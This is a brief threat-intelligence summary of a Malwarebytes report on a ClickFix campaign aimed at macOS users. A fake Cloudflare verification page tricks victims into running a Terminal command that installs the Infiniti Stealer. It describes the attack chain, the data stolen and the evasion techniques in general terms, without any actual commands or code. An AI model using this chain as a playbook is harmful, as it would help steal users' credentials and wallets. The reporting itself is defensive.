Malwarebytes reports a macOS-targeted ClickFix campaign that lures victims to paste and run a Cloudflare-themed Terminal command which downloads a Bash script that deploys a Nuitka-compiled loader and the Infiniti Stealer information stealer. The Python-based stealer harvests browser credentials, Keychain items, crypto wallets, developer secrets and screenshots, exfiltrates data to a C2 via HTTP, and notifies operators via Telegram. #InfinitiStealer #ClickFix
Keypoints
- The attack uses a fake Cloudflare verification page to trick macOS users into pasting and executing Terminal commands.
- Executing the command fetches a Bash script that decodes a payload, writes a second-stage binary to a temporary folder, removes its quarantine flag, and runs it.
- The dropped binary is a Nuitka-compiled loader that decompresses embedded data and launches the Infiniti Stealer payload.
- Infiniti Stealer targets browser credentials, Keychain data, cryptocurrency wallets, developer secrets, and screenshots, then exfiltrates data via HTTP and sends notifications to Telegram.
- Evasion techniques include randomized execution delays, sandbox/analysis checks, and compiling Python into native binaries to hinder static analysis, showing ClickFix tactics moving from Windows to macOS.
Read More: https://www.securityweek.com/cloudflare-themed-clickfix-attack-drops-infiniti-stealer-on-macs/